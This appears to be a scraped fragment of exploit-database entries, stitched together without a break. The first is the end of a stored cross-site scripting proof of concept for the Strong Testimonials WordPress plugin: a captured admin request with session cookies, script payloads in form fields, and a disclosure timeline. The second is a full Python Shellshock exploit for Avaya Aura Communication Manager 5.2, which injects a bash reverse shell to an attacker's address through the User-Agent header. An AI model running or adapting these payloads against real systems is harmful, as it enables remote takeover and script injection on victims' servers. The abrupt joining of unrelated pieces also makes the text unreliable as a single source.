Origin: http://testing.com Connection: close Cookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg Upgrade-Insecure-Requests: 1 _wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator 3. Timeline Vulnerability reported to the Strong Testimonials team – January 23, 2020 Strong Testimonials version 2.40.1 containing the fix released – January 25, 2020

# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution # Exploit Author: Sarang Tumne a.k.a SarT # Date: 2020-02-14 # Confirmed on release 5.2 # Vendor: https://www.avaya.com/en/ # Avaya's advisory: # https://downloads.avaya.com/css/P8/documents/100183151 # Exploit generates a reverse shell to a nc listener (Shellshock Exploit) ############################################### #!/usr/bin/python import sys import requests if len(sys.argv) < 4: print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit" print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>" print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337" print "[*] Netcat Listener: nc -lvvnp <port>" print "\n" sys.exit() #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() CM = sys.argv[1] url = "https://" + CM + "/mt/mt.cgi" attacker_ip = sys.argv[2] rev_port = sys.argv[3] http_headers = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1' } def main(): if len(sys.argv) == 4: print "[+] Success, spawning a shell on your custom port :)..." requests.get(url, headers=http_headers, verify=False, timeout=5) else: print "[-] Something went wrong, quitting..." sys.exit() if __name__ == "__main__": main()